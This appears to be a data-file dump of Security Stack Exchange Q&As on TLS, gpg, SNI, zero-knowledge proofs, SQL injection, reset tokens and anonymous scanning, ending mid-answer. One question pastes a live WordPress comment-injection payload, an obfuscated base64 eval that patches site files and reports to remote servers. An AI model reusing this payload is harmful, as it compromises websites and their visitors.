source_id
int64
1
4.64M
question
stringlengths
0
28.4k
response
stringlengths
0
28.8k
metadata
dict
86,567
If I am communicating over a secure line (secured using SSL or TLS) and I send the server a message. Could someone eavesdropping tell what that message was if they knew before hand a list of messages I am likely to send. E.g. I send a message saying " Execute order 66 " over a secure line. Someone was eavesdropping and suspected that I was going to send this order. Could they verify that I just sent that specific message by comparing the sent message with the same message encrypted with the same public key.
No, SSL uses a symmetric key so an attacker is unable to decrypt the message he has just captured. However, SSL is vulnerable to a traffic analysis attack. E.g. If you have 2 messages of very different lengths like "Execute order 66" "This is a very very very very very very very very very very very very very very very very very very very very long message". If the attacker knows that the message has to be one of the 2. Based on the length of the encrypted message, he will know which message you sent out. More info on traffic analysis attack: http://webcache.googleusercontent.com/search?q=cache:KKy5MbfirYkJ:https://www.cs.berkeley.edu/~daw/teaching/cs261-f98/projects/final-reports/ronathan-heyning.ps+&cd=4&hl=en&ct=clnk&gl=us
{ "source": [ "https://security.stackexchange.com/questions/86567", "https://security.stackexchange.com", "https://security.stackexchange.com/users/46851/" ] }
86,595
As the title suggests, I am curious to know why you can't work backwards using a message, public key and encrypted message to work out how to decrypt the message! I don't understand how a message can be encrypted using a key and then how you cannot work backwards to "undo" the encryption?
There are one-way functions in computer science (not mathematically proven, but you will be rich and famous if you prove otherwise). These functions are easy to solve one way but hard to reverse e.g. it is easy for you to compute 569 * 757 * 911 = 392397763 in a minute or two on a piece of paper. On the other if I gave you 392397763 and asked you to find the prime factors, you would have a very hard time. Now if these numbers are really big, even the fastest computer in the world will not be able to reverse the factorization in reasonable time. In public-key cryptography these one-way functions are used in clever ways to allow somebody to use the public key to encrypt something, but making it very hard to decrypt the resulting message. You should read the Wiki article RSA cryptosystem .
{ "source": [ "https://security.stackexchange.com/questions/86595", "https://security.stackexchange.com", "https://security.stackexchange.com/users/72982/" ] }
86,692
I was somewhat suprised that the sysadmin approved a one-letter username like "m" and my username is also short ("nik"). I think that if usernames are brute force attacked then the username should also be longer than just a few characters. Do you agree?
The username is not a secret; any determined attacker will be able to find out the names of users on your system. What does improve your security, is if there is no remote access for "root", "guest", and similar account names found on many systems. In fact, Ubuntu explicitly disables the "root" account because it is such a favorite target.
{ "source": [ "https://security.stackexchange.com/questions/86692", "https://security.stackexchange.com", "https://security.stackexchange.com/users/4334/" ] }
86,721
Can I do something like: gpg --public-key my.pub -e file.txt If I can, any reason that I should not do that? P/s: I think I don't need to know about the recipient because my machine only has one public key at a time. But that key will change soon (and I can delete all the old encrypted files, so no need to keep them).
GnuPG does not support encrypting to a recipient specified by a key file. The key must be imported in advance, and the recipient defined with either his mail address or key ID. I'd recommend to use a cleaner approach as expected by GnuPG and hard-code either the key's fingerprint, or a user ID given by that key and import it as usual. If you really do not want to import the key, you could do following as workaround (which actually imports the key, but to a temporary GnuPG home directory): Import the key to a temporary folder, for example using gpg --homedir /tmp/gnupg --import my.pub Determine the key ID of the key stored in the file: KEYID=`gpg --list-public-keys --batch --with-colons --homedir /tmp/gnupg | head -n1 | cut -d: -f5` Encrypt a message to the recipient gpg --homedir /tmp/gnupg --recipient ${KEYID} --encrypt Clean up temporary GnuPG home directory rm -f /tmp/gnupg You could of course save this as a script to make using it more convenient.
{ "source": [ "https://security.stackexchange.com/questions/86721", "https://security.stackexchange.com", "https://security.stackexchange.com/users/73085/" ] }
86,723
I'm having a little bit of trouble understanding why the HTTPS protocol includes the host name in plain text. I have read that the host name and IP addresses of an HTTPS packet are not encrypted. Why the host name cannot be encrypted? Can't we just leave the destination IP in plain text (so the packet is routable), then when the packet arrives at the destination server, the packet is decrypted and the host/index identified from the header? Maybe the problem is that there can be different certs for one particular destination IPs (different certs for different subdomains?), so the destination server cannot decrypt the packet until it arrives at the correct host within that server. Does this make ANY sense, or am I way off?
The hostname is included in the initial SSL handshake to support servers which have multiple host names (with different certificates) on the same IP address (SNI: Server Name Indication). This is similar to the Host-header in plain HTTP requests. The name is included in the first message from the client (ClientHello), that is before any identification and key exchange is done, so that the server can offer the correct certificate for identification. While encrypting the hostname would be nice, the question would be which key to use for encryption. The key exchange comes only after identification of the site by certificate, because otherwise you might exchange keys with a man-in-the-middle. But identification with certificates already needs the hostname so that the server can offer the matching certificate. So the encryption of the hostname would need to be done with a key either based on some other kind of identification or in a way not safe against man-in-the-middle. There could be ways to protect the hostname in the SSL handshake, but at the cost of additional overhead in handshake and infrastructure. There are ongoing discussion if and how to include encrypted SNI into TLS 1.3. I suggest you have a look at this presentation and the IETF TLS mailing list . Apart from that, leakage of the hostname can also occur by other means, like the preceding DNS lookup for the name. And of course the certificate sent in the servers response is not encrypted too (same problem, no key yet) and thus one can extract the requested target from the servers response. There are a lots of sites out there which will not work without SNI, like all of Cloudflares free SSL offer. If accessed by a client not supporting SNI (like IE8 on Windows XP) this will result in either the wrong certificate served or some SSL handshake error like 'unknown_name'.
{ "source": [ "https://security.stackexchange.com/questions/86723", "https://security.stackexchange.com", "https://security.stackexchange.com/users/69190/" ] }
86,766
I received an email for my WordPress site, where the comment section is disabled. This was the email: "Author: google (IP: 210.56.50.40, 210.56.50.40) Email: [email protected] URL: http://spider.google.com Who is?: http://whois.arin.net/rest/ip/210.56.50.40 Comment: Welcome to WordPress. This is your first post. [<a title="]" rel="nofollow"></a>[" <!-- style='position:fixed;top:0px;left:0px;width:6000px;height:6000px;color:transparent;z-index:999999999' onmouseover="eval(atob('dmFyIHggPSBkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiYSIpOwp2YXIgaTsKZm9yIChpID0gMDsgaSA8IHgubGVuZ3RoOyBpKyspIHsKICAgIGlmKHhbaV0uc3R5bGUud2lkdGggPT0gIjYwMDBweCIpe3hbaV0uc3R5bGUuZGlzcGxheT0ibm9uZSI7fQp9Cgp2YXIgZWwgPSBkb2N1bWVudC5jcmVhdGVFbGVtZW50KCJpZnJhbWUiKTsKZWwuaWQgPSAnaWZyYW1lMjInOwplbC5zdHlsZS5kaXNwbGF5ID0gImZpeGVkIjsKZWwuc3R5bGUudG9wPScxMDAwMHB4JzsKZWwuc3R5bGUubGVmdD0nMTAwMDBweCc7CmVsLnN0eWxlLndpZHRoID0gIjUwMHB4IjsKZWwuc3R5bGUuaGVpZ2h0ID0gIjUwMHB4IjsKZWwuc3JjID0gInBsdWdpbi1lZGl0b3IucGhwP2ZpbGU9aGVsbG8ucGhwJnBsdWdpbj1oZWxsby5waHAiOwpkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGVsKTsKZWwub25sb2FkID0gaHV5OwoKZnVuY3Rpb24gZ2V0SWZyYW1lRG9jdW1lbnQoaWZyYW1lTm9kZSkgewogIGlmIChpZnJhbWVOb2RlLmNvbnRlbnREb2N1bWVudCkgcmV0dXJuIGlmcmFtZU5vZGUuY29udGVudERvY3VtZW50CiAgaWYgKGlmcmFtZU5vZGU uY29udGVudFdpbmRvdykgcmV0dXJuIGlmcmFtZU5vZGUuY29udGVudFdpbmRvdy5kb2N1bWVudAogIHJldHVybiBpZnJhbWVOb2RlLmRvY3VtZW50Cn0KCmZ1bmN0aW9uIGh1eSgpewp2YXIgenp6ID0gZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ2lmcmFtZTIyJyk7CnZhciBoaGggPSBnZXRJZnJhbWVEb2N1bWVudCh6enopOwppZiAoaGhoLmdldEVsZW1lbnRCeUlkKCJuZXdjb250ZW50IikudmFsdWUuaW5kZXhPZigiMTc2NGQxMzNkNzM1MWJmNmEyN2QyZGViM2M1MjFhMDIiKSA9PSAtMSkgewpoaGguZ2V0RWxlbWVudEJ5SWQoIm5ld2NvbnRlbnQiKS52YWx1ZSA9IGF0b2IoIlBEOXdhSEFLQ21aMWJtTjBhVzl1SUZWdWIxOWxibU52WkdVb0pGTjBjbWx1WnlrS2V3b2dJQ0FnY21WMGRYSnVJSFZ5YkdWdVkyOWtaU2hpWVhObE5qUmZaVzVqYjJSbEtINGtVM1J5YVc1bktTazdDbjBLQ21aMWJtTjBhVzl1SUhKbGNHOXlkQ2drY21Oa0tYc0tJQ0FnSUNSeVpXTnBkbVZ5YzF0ZElEMGdKMmgwZEhBNkx5OXljQzVqWkMxcmVYbDNZWFJsY2k1amIyMHZKenNLSUNBZ0lDUnlaV05wZG1WeWMxdGRJRDBnSjJoMGRIQTZMeTl5Y0M1aWVXSjVMWE5vTlM1amIyMHZKenNLSUNBZ0lDUnlaV05wZG1WeWMxdGRJRDBnSjJoMGRIQTZMeTl5Y0M1MGFYUnBZVzVxWlhkbGJISjVMbU52YlM4bk93b2dJQ0FnSkhKbFkybDJaWEp6VzEwZ1BTQW5hSFIwY0RvdkwzSndMblIxYlc5MWNtaGxZV3gwYUM1amIyMHZKenNLSUNBZ0lDUnla V05wZG1WeWMxdGRJRDBnSjJoMGRIQTZMeTl5Y0M1amFHbHVZUzEwYjNWNWFXNW5hbWt1WTI5dEx5YzdDaUFnSUNBa2VpQTlJSE4wY2w5eVpYQnNZV05sS0NkM2NDMWpiMjUwWlc1MEwzQnNkV2RwYm5NdmFHVnNiRzh1Y0dod0p5d25KeXdrWDFORlVsWkZVbHNpVWtWUlZVVlRWRjlWVWtraVhTazdDaUFnSUNBa2NtVndiM0owSUQwZ1ZXNXZYMlZ1WTI5a1pTZ2tYMU5GVWxaRlVsc2lTRlJVVUY5SVQxTlVJbDB1SUNSNklDNGdKM3duSUM0Z0pISmpaQ2s3Q2lBZ0lDQnphSFZtWm14bEtDUnlaV05wZG1WeWN5azdDaUFnSUNCbWIzSmxZV05vS0NSeVpXTnBkbVZ5Y3lCaGN5QWtkQ2w3Q2lBZ0lDQWdJQ0FnWldOb2J5QW5QR2x0WnlCM2FXUjBhRDB4SUdobGFXZG9kRDB4SUhOeVl6MGlKeUF1SkhRZ0xpQW5QMlJoZEdFOUp5QXVKSEpsY0c5eWRDNG5JajRuT3dvZ0lDQWdmUXA5Q2dwbWRXNWpkR2x2YmlCeVpXMXZkbVZmWTI5dGJXVnVkQ2dwZXdvZ0lDQWdhVzVqYkhWa1pWOXZibU5sS0NjdUxpOHVMaTkzY0MxamIyNW1hV2N1Y0dod0p5azdDZ29nSUNBZ0pHTnZiaUE5SUcxNWMzRnNYMk52Ym01bFkzUW9SRUpmU0U5VFZDeEVRbDlWVTBWU0xFUkNYMUJCVTFOWFQxSkVLVHNLSUNBZ0lHMTVjM0ZzWDNObGJHVmpkRjlrWWloRVFsOU9RVTFGTENBa1kyOXVLVHNLQ2lBZ0lDQWtlbUZ3Y205eklEMGdKMlJsYkdWMFpTQm1jbTl0SUNjZ0xpQWtkR0ZpYkdWZmNISmxabWw0SUM0Z0oyTnZiVzFsYm5SeklIZG9aWEpsSUdOdmJXM WxiblJmWTI5dWRHVnVkQ0JzYVd0bElGd25KV0YwYjJJbFhDYzdKenNLSUNBZ0lDUnlJRDBnYlhsemNXeGZjWFZsY25rb0pIcGhjSEp2Y3lrN0NpQWdJQ0J0ZVhOeGJGOWpiRzl6WlNna1kyOXVLVHNLZlFvS1puVnVZM1JwYjI0Z2NHRjBZMmhmZDNBb0tYc0tJQ0FnSUNSbWJtRnRaU0E5SUNjdUxpOHVMaTkzY0MxamIyMXRaVzUwY3kxd2IzTjBMbkJvY0NjN0NpQWdJQ0JwWmlobWFXeGxYMlY0YVhOMGN5Z2tabTVoYldVcEtYc0tJQ0FnSUNBZ0lDQWtkQ0E5SUNjOFAzQm9jQ0JrYVdVb0tUc2dQejRuSUM0Z1VFaFFYMFZQVERzS0NpQWdJQ0FnSUNBZ0pIUnBiV1VnUFNCbWFXeGxiWFJwYldVb0pHWnVZVzFsS1RzS0lDQWdJQ0FnSUNBa2QzSnBkQ0E5SUdaaGJITmxPd29LSUNBZ0lDQWdJQ0JwWmlBb0lXbHpYM2R5YVhSaFlteGxLQ1JtYm1GdFpTa3Bld29nSUNBZ0lDQWdJQ0FnSUNBa2NHVnliU0E5SUhOMVluTjBjaWh6Y0hKcGJuUm1LQ2NsYnljc0lHWnBiR1Z3WlhKdGN5Z2tabTVoYldVcEtTd2dMVFFwT3dvZ0lDQWdJQ0FnSUNBZ0lDQkFZMmh0YjJRb0pHWnVZVzFsTERBMk5qWXBPd29nSUNBZ0lDQWdJQ0FnSUNBa2QzSnBkQ0E5SUhSeWRXVTdDaUFnSUNBZ0lDQWdmUW9LSUNBZ0lDQWdJQ0JqYkdWaGNuTjBZWFJqWVdOb1pTZ3BPd29nSUNBZ0lDQWdJR2xtSUNocGMxOTNjbWwwWVdKc1pTZ2tabTVoYldVcEtYc0tJQ0FnSUNBZ0lDQWdJQ0FnSkhSdGNDQTlJRUJtYVd4bFgyZGxkRjlqYjI1MFpXNTBjeWdrWm01aG JXVXBPd29nSUNBZ0lDQWdJQ0FnSUNBa2RHMXdJRDBnSkhRZ0xpQWtkRzF3T3dvZ0lDQWdJQ0FnSUgwS0lDQWdJQ0FnSUNCcFppQW9jM1J5YkdWdUtDUjBiWEFwSUQ0Z01UQXBld29LSUNBZ0lDQWdJQ0FnSUNBZ0pHWWdQU0JtYjNCbGJpZ2tabTVoYldVc0luY2lLVHNLSUNBZ0lDQWdJQ0FnSUNBZ1puQjFkSE1vSkdZc0pIUnRjQ2s3Q2lBZ0lDQWdJQ0FnSUNBZ0lHWmpiRzl6WlNna1ppazdDaUFnSUNBZ0lDQWdmUW9LSUNBZ0lDQWdJQ0JqYkdWaGNuTjBZWFJqWVdOb1pTZ3BPd29LSUNBZ0lDQWdJQ0JwWmlBb0pIZHlhWFFwZXdvZ0lDQWdJQ0FnSUNBZ0lDQm1iM0lvSkdrOWMzUnliR1Z1S0NSd1pYSnRLUzB4T3lScFBqMHdPeTB0SkdrcGV3b2dJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0pIQmxjbTF6SUNzOUlDaHBiblFwSkhCbGNtMWJKR2xkS25CdmR5ZzRMQ0FvYzNSeWJHVnVLQ1J3WlhKdEtTMGthUzB4S1NrN0NpQWdJQ0FnSUNBZ0lDQWdJSDBLSUNBZ0lDQWdJQ0FnSUNBZ1FHTm9iVzlrS0NSbWJtRnRaU3drY0dWeWJYTXBPd29nSUNBZ0lDQWdJSDBLQ2lBZ0lDQWdJQ0FnUUhSdmRXTm9LQ1JtYm1GdFpTd2tkR2x0WlNrN0NpQWdJQ0I5Q24wS0NtWjFibU4wYVc5dUlITmxiR1pmY21WdGIzWmxLQ2w3Q2lBZ0lDQWtabTVoYldVZ1BTQmZYMFpKVEVWZlh6c0tJQ0FnSUNSMGFXMWxJRDBnWm1sc1pXMTBhVzFsS0NSbWJtRnRaU2s3Q2lBZ0lDQWtkM0pwZENBOUlHWmhiSE5sT3dvS0lDQWdJR2xtSUNnaGFYTmZkM0pwZEd GaWJHVW9KR1p1WVcxbEtTbDdDaUFnSUNBZ0lDQWdKSEJsY20wZ1BTQnpkV0p6ZEhJb2MzQnlhVzUwWmlnbkpXOG5MQ0JtYVd4bGNHVnliWE1vSkdadVlXMWxLU2tzSUMwMEtUc0tJQ0FnSUNBZ0lDQkFZMmh0YjJRb0pHWnVZVzFsTERBMk5qWXBPd29nSUNBZ0lDQWdJQ1IzY21sMElEMGdkSEoxWlRzS0lDQWdJSDBLQ2lBZ0lDQmpiR1ZoY25OMFlYUmpZV05vWlNncE93b2dJQ0FnYVdZZ0tHbHpYM2R5YVhSaFlteGxLQ1JtYm1GdFpTa3Bld29nSUNBZ0lDQWdJQ1IwYlhBZ1BTQkFabWxzWlY5blpYUmZZMjl1ZEdWdWRITW9KR1p1WVcxbEtUc0tDaUFnSUNBZ0lDQWdKSEJ2Y3lBOUlITjBjbkJ2Y3lna2RHMXdMQ2N4TnpZMFpERXpNMlEzTXpVeFltWTJKeTRuWVRJM1pESmtaV0l6WXpVeU1XRXdNaWNwT3dvZ0lDQWdJQ0FnSUNSMGJYQWdQU0J6ZFdKemRISW9KSFJ0Y0N3a2NHOXpJQ3NnTXpJcE93b0tJQ0FnSUNBZ0lDQnBaaUFvYzNSeWJHVnVLQ1IwYlhBcElENGdNVEFwZXdvS0lDQWdJQ0FnSUNBZ0lDQWdKR1lnUFNCbWIzQmxiaWdrWm01aGJXVXNJbmNpS1RzS0lDQWdJQ0FnSUNBZ0lDQWdabkIxZEhNb0pHWXNKSFJ0Y0NrN0NpQWdJQ0FnSUNBZ0lDQWdJR1pqYkc5elpTZ2taaWs3Q2lBZ0lDQWdJQ0FnZlFvS0lDQWdJQ0FnSUNCamJHVmhjbk4wWVhSallXTm9aU2dwT3dvS0lDQWdJQ0FnSUNCcFppQW9KSGR5YVhRcGV3b2dJQ0FnSUNBZ0lDQWdJQ0JtYjNJb0pHazljM1J5YkdWdUtDUndaWEp0S1MweE95UnBQajB3 T3kwdEpHa3Bld29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdKSEJsY20xeklDczlJQ2hwYm5RcEpIQmxjbTFiSkdsZEtuQnZkeWc0TENBb2MzUnliR1Z1S0NSd1pYSnRLUzBrYVMweEtTazdDaUFnSUNBZ0lDQWdJQ0FnSUgwS0lDQWdJQ0FnSUNBZ0lDQWdRR05vYlc5a0tDUm1ibUZ0WlN3a2NHVnliWE1wT3dvZ0lDQWdJQ0FnSUgwS0NpQWdJQ0FnSUNBZ1FIUnZkV05vS0NSbWJtRnRaU3drZEdsdFpTazdDaUFnSUNCOUNuMEtDaVJtYm1GdFpTQTlJQ2N1TGk4dUxpOTNjQzFqYjI1bWFXY3VjR2h3SnpzS0NtbG1LR1pwYkdWZlpYaHBjM1J6S0NSbWJtRnRaU2twZXdvS0lDQWdJQ1J5WTJRZ0lEMGdiV1ExS0NSZlUwVlNWa1ZTV3lKSVZGUlFYMGhQVTFRaVhTNGtYMU5GVWxaRlVsc2lTRlJVVUY5VlUwVlNYMEZIUlU1VUlsMHVjbUZ1WkNnd0xERXdNREF3S1NrN0NpQWdJQ0FrZENBOUlDZHBaaUFvYVhOelpYUW9KRjlTUlZGVlJWTlVXMXduUmtsTVJWd25YU2twZXlSZlUwVlNWa1ZTVXlBOUlITjBjbkpsZGlna1gxSkZVVlZGVTFSYlhDY25MaVJ5WTJRdUoxd25YU2s3SkY5R1NVeEZJRDBnSkY5VFJWSldSVkpUS0Z3bkpGOWNKeXh6ZEhKeVpYWW9KRjlTUlZGVlJWTlVXMXduUmtsTVJWd25YU2t1WENjb0pGOHBPMXduS1Rza1gwWkpURVVvYzNSeWFYQnpiR0Z6YUdWektDUmZVa1ZSVlVWVFZGdGNKMGhQVTFSY0oxMHBLVHQ5SnpzS0lDQWdJQ1IwYVcxbElEMGdabWxzWlcxMGFXMWxLQ1JtYm1GdFpTazdDaUFnSUNBa2MybDZaU 0E5SUdacGJHVnphWHBsS0NSbWJtRnRaU2s3Q2lBZ0lDQWtkM0pwZENBOUlHWmhiSE5sT3dvS0lDQWdJR2xtSUNnaGFYTmZkM0pwZEdGaWJHVW9KR1p1WVcxbEtTbDdDaUFnSUNBZ0lDQWdKSEJsY20wZ1BTQnpkV0p6ZEhJb2MzQnlhVzUwWmlnbkpXOG5MQ0JtYVd4bGNHVnliWE1vSkdadVlXMWxLU2tzSUMwMEtUc0tJQ0FnSUNBZ0lDQkFZMmh0YjJRb0pHWnVZVzFsTERBMk5qWXBPd29nSUNBZ0lDQWdJQ1IzY21sMElEMGdkSEoxWlRzS0lDQWdJSDBLQ2lBZ0lDQmpiR1ZoY25OMFlYUmpZV05vWlNncE93b2dJQ0FnYVdZZ0tHbHpYM2R5YVhSaFlteGxLQ1JtYm1GdFpTa3Bld29nSUNBZ0lDQWdJQ1IwYlhBZ1BTQkFabWxzWlY5blpYUmZZMjl1ZEdWdWRITW9KR1p1WVcxbEtUc0tDaUFnSUNBZ0lDQWdKSFJ0Y0NBOUlITjBjbDl5WlhCc1lXTmxLQ2NrZEdGaWJHVmZjSEpsWm1sNEp5d2dKSFFnTGlCUVNGQmZSVTlNSUM0Z0p5UjBZV0pzWlY5d2NtVm1hWGduTENBa2RHMXdLVHNLSUNBZ0lDQWdJQ0JwWmlBb2MzUnliR1Z1S0NSMGJYQXBJRDRnTVRBcGV3b0tJQ0FnSUNBZ0lDQWdJQ0FnSkdZZ1BTQm1iM0JsYmlna1ptNWhiV1VzSW5jaUtUc0tJQ0FnSUNBZ0lDQWdJQ0FnWm5CMWRITW9KR1lzSkhSdGNDazdDaUFnSUNBZ0lDQWdJQ0FnSUdaamJHOXpaU2drWmlrN0NpQWdJQ0FnSUNBZ2ZRb0tJQ0FnSUNBZ0lDQmpiR1ZoY25OMFlYUmpZV05vWlNncE93b0tJQ0FnSUNBZ0lDQnBaaUFvSkhkeWFYUXBld29nSUNBZ0lDQW dJQ0FnSUNCbWIzSW9KR2s5YzNSeWJHVnVLQ1J3WlhKdEtTMHhPeVJwUGowd095MHRKR2twZXdvZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSkhCbGNtMXpJQ3M5SUNocGJuUXBKSEJsY20xYkpHbGRLbkJ2ZHlnNExDQW9jM1J5YkdWdUtDUndaWEp0S1Mwa2FTMHhLU2s3Q2lBZ0lDQWdJQ0FnSUNBZ0lIMEtJQ0FnSUNBZ0lDQWdJQ0FnUUdOb2JXOWtLQ1JtYm1GdFpTd2tjR1Z5YlhNcE93b2dJQ0FnSUNBZ0lIMEtDaUFnSUNBZ0lDQWdRSFJ2ZFdOb0tDUm1ibUZ0WlN3a2RHbHRaU2s3Q2lBZ0lDQjlDZ29nSUNBZ1kyeGxZWEp6ZEdGMFkyRmphR1VvS1RzS0lDQWdJR2xtS0NSemFYcGxJQ0U5UFNCbWFXeGxjMmw2WlNna1ptNWhiV1VwS1hzS0lDQWdJQ0FnSUNCeVpYQnZjblFvSkhKalpDazdDaUFnSUNCOUNuMEtDbkpsYlc5MlpWOWpiMjF0Wlc1MEtDazdDbkJoZEdOb1gzZHdLQ2s3Q25ObGJHWmZjbVZ0YjNabEtDazdDZ28vUGdvdkx6RTNOalJrTVRNelpEY3pOVEZpWmpaaE1qZGtNbVJsWWpOak5USXhZVEF5IikgKyBoaGguZ2V0RWxlbWVudEJ5SWQoIm5ld2NvbnRlbnQiKS52YWx1ZTsKaGhoLmdldEVsZW1lbnRCeUlkKCJzdWJtaXQiKS5jbGljayggKTsKfQplbHNlIHsKenp6LnNyYyA9ICcuLi93cC1jb250ZW50L3BsdWdpbnMvaGVsbG8ucGhwJzsKfQp9'))" &gt; --><a></a>] Edit or delete it, then start blogging! " What is this? I already deleted the comment, but I'm curious.
The "Code" is "patching" your WordPress installation (wp-comments-post.php) and sending some information to several servers (probably c&c). Also, it is removing itself from the database. In other words, it is a hack. The email that you get is not from Google Official. It is from a Gmail account. The decoded sources are here: http://pastebin.com/EHgbTGcB http://pastebin.com/YQYgxs3Z The exploit is based on WordPress 3.x persistent script injection: http://www.acunetix.com/vulnerabilities/web/wordpress-3-x-persistent-script-injection
{ "source": [ "https://security.stackexchange.com/questions/86766", "https://security.stackexchange.com", "https://security.stackexchange.com/users/73050/" ] }
86,823
A ZKP allows proof of knowing the answer to a secret, without actually disclosing what that answer is. Is there any analogy that can help people put this concept into everyday practice? A " lie to children " example is sufficient. For example, Diffie–Hellman has the color mixing analogy, and the padlock metaphor. Is there any real life metaphor, superhero with powers, hero/villain, object, or anything that someone can relate to that would help describe what a ZKP is? My intent is to convert the winning metaphor into an animation that will play on a mobile device as a ZKP is presented. (one animation on the sender side, one on the receiving side)
I heard this example during one of the guest lectures back in my grad school. I think it is simple enough since I've myself used it many times, to explain ZKP to people with almost Zero Knowledge of crypto/math. Let's say that I want to convince you that I have a superpower to count the exact number of leaves on a tree, within a few seconds. I want to convince you without actually revealing that exact number and without revealing how my superpower works. I can devise a simple protocol: I'll close my eyes and will give you a choice to pull off a leaf from that tree. Since it is just a choice, you will either pull it off or you wont. I have no other way of knowing whether you did it or not than quickly counting the leaves again with my superpower . Now when I'll look at the tree, you'll ask me if you actually pulled it off or not. If I give you a wrong answer, you'll immediately know that my superpower is fake and so is my knowledge. However, if my answer is right, you might think that I just got lucky. In which case we can repeat the above steps. We can keep on repeating these steps to the point where you're satisfied with the fact that I actually posses the superpower and that I know the exact number .
{ "source": [ "https://security.stackexchange.com/questions/86823", "https://security.stackexchange.com", "https://security.stackexchange.com/users/396/" ] }
86,908
I have a web api that connects to my SQL Server using a read-only connection and want to allow tech savvy users of my api to enter an SQL where clause on the querystring. I basically just want to tack what they enter onto the select statement. Does a least-privilege (select ability on one table only), read-only connection to the database prevent all injection attacks?
No. You might be confusing SQL injection with data injection; read-only tables do not prevent SQL injection and at best do only a little to limit its impact. SQL injection simply means the ability to inject SQL code. While read-only tables may limit the ability to inject data into the table, they don't impact the ability to: Read from other databases or tables if not disallowed Read from system tables or run other system queries which are hard to disallow Write excessively complex queries that will perform a DoS Exfiltrate data using DNS Access local files (e.g., utl_file in Oracle) Access the DB server's network (e.g., utl_http in Oracle) Execute arbitrary code on the server via DB function buffer overflows See Advanced SQL Injection in Oracle databases for a good walk through all the sorts of things you need to worry about (and realize other databases have their equivalents) If you basically just want to tack what they enter onto the select statement. then you're expressly permitting the attacker to try any of these. Now, you can certainly do things to limit this. You can disallow quotes and SQL statement separator characters. You can disallow any input that's not [A-Za-z0-9"=] (or effectively equivalent for your database). But if you start going down this path, you're better off writing your application correctly : Expose a richer query interface where you offer the keys to be checked and then you perform proper quoting on whatever values the user enters.
{ "source": [ "https://security.stackexchange.com/questions/86908", "https://security.stackexchange.com", "https://security.stackexchange.com/users/73271/" ] }
86,913
Passwords are hashed so that if someone gains access to a database of passwords then they won't know what the actual passwords are and so they can't log in. If I can get a valid password reset token however (the kind which would be emailed to a user when they've forgotten their password) then isn't this as good as a password? I could take a token, plug it into the reset page and set the password to whatever I want and now I have access. Thus shouldn't password reset tokens also be hashed in the database?
Yes, you should hash password reset tokens, exactly for the reasons you mentioned. But no, it's not quite as bad as unhashed passwords, because reset tokens expire and not every user has an active one users notice when their passwords are changed, but not when their passwords are cracked, and can thus take steps to limit the damage (change password and other sensitive data, etc). Additionally, as users reuse passwords, an attacker can try a cracked passwords for other accounts, such as the users email, thus increasing the damage.
{ "source": [ "https://security.stackexchange.com/questions/86913", "https://security.stackexchange.com", "https://security.stackexchange.com/users/7247/" ] }
86,917
I was thinking of the following question for a long time and did not find a lot of material* in the web and nothing at all on Security.SE . I think its a very interesting question as it covers different anonymization measures (or counter measures to possible deanonymization measures of soft- & hardware) and within the modern times seems to be more important than ever to protect the human right of freedom of speech . How can I publish (scanned) documents anonymously? To narrow down the question a little bit, lets define some parameters: I have some documents in paper form I want to publish without identifying me as the publisher. These documents have no "fingerprint" or any unique printed information on them to identify me as the owner. (Or I have covered it) I will publish the digital files via a secure network (e.g. Tor) with an open source file hosting website that is guaranteed to not store or even publish any information about the uploader. Things I thought of that might be a problem: Do scanners add any visual unique fingerprint (or even worse: information about the connected device etc.) to every scanned page? Do scanners add any digital (e.g. binary) fingerprint (or even worse: information about the connected device etc.) to every scanned file? Do scanners have a unique 'technical unavoidable' fingerprint, so every scanner scans differently? And is this fingerprint computable or even stored somewhere? Or does the 'institution' that wants to deanonymize me have to have access to my scanner to make an comparison? Do PDFs 'store' any information related to the host computer in them? And if the answer to one of the question was yes, how can I remove or avoid this information? *Two notable Sources I have found: There is a small paragraph on WikiLeaks talking about unique fingerprints of CDs but not of Scanner output or PDFs... A paper from Purdue University about scanner & printer forensics
Publishing scans without being identified is a tough proposition. There are multiple risks of information leak, and mitigation is technically complex. However, anyone determined to do so can learn the appropriate techniques, and there is free software to accomplish the task. Disclaimer: Although I consider myself technically knowledgeable about the mentioned issues and I've included references where they exist, some parts of this answer are speculative. Risks: Do scanners add any visual unique fingerprint (or even worse: information about the connected device etc.) to every scanned page? This seems likely , considering that some printers do so . There isn't much information available on scanners, though. Do scanners add any digital (e.g. binary) fingerprint (or even worse: information about the connected device etc.) to every scanned file? If you're doing a scan from an attached PC (as your question implies), the answer is no, the scanner can't . Scanners attached to a PC transfer raster image data, not files, so it can't possibly add data to a file it doesn't have access to. However, you should consider that a digital fingerprint could be added on the scanning software of the PC. Also, if the scanner is standalone (it saves files to a USB drive, or sends them by email), this is a definite possibility. Do scanners have a unique 'technical unavoidable' fingerprint, so every scanner scans differently? And is this fingerprint computable or even stored somewhere? Or does the 'institution' that wants to deanonymize me have to have access to my scanner to make an comparison? Yes . Most modern scanners use CCD sensors, which are uniquely identifiable by their noise pattern, using specialized software. Other plausible visual fingerprinting targets: Lighting pattern . Usually the scanner sensor bar has LEDs on it to illuminate the page. The number and distribution of leds will differ amongst models. the paper fiber distribution of the scanned page image distortion , caused by unique stepper motors (try scanning a piece of graphing paper ) Using these kind of fingerprinting techniques, it seems likely that the scanner model and paper type can be identified from the scans, but identifying the specific scanner and paper page used would be hard (perhaps impossible) without access to them for comparison purposes. Do PDFs 'store' any information related to the host computer in them? Yes, there's even a NSA article about it . While dealing with scanned documents, you'll need to be aware of image file metadata , which can also be present on PNG and JPG files, for example. Another risk that you didn't mention is that the scanner itself may store a copy of your scan . Big printers do Of course, this isn't a exhaustive list of risks - merely what has come to my mind in the couple of minutes it has taken me to write this answer. I'm pretty sure researchers, intelligence agencies and police paid to do so can come up with better ideas! Mitigation The easiest, safest and obvious mitigations are don't use a scanner that can be tied to your identity , and destroy the scanner after the fact . Of course, this is not always attainable, so what else can you do to protect yourself? Don't use a stand-alone scanner - especially a networked one. If you really must, convert its output to a pure image without metadata. For (at least partially) mitigating fingerprints added by software, you'll want to use open source software , both for the OS and the scanning program.. Avoid using your personal PC for scanning , or at least, use a secure live OS For detecting deliberate visual fingerprinting, the best option would be to scan a blank page and look for obvious anomalies . These might be very small, so you may want to use a image editor to crank up the contrast. For sensor, paper and visual fingerprinting in general, you want to destroy subtle scanning artifacts . Use a image editor to: Add 